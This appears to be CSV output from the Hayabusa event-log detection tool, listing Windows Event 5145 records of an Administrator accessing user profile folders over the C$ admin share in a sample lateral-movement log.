2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\.ssh : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\New folder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\RDPWrap-v1.6.2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\translations : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\garbage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
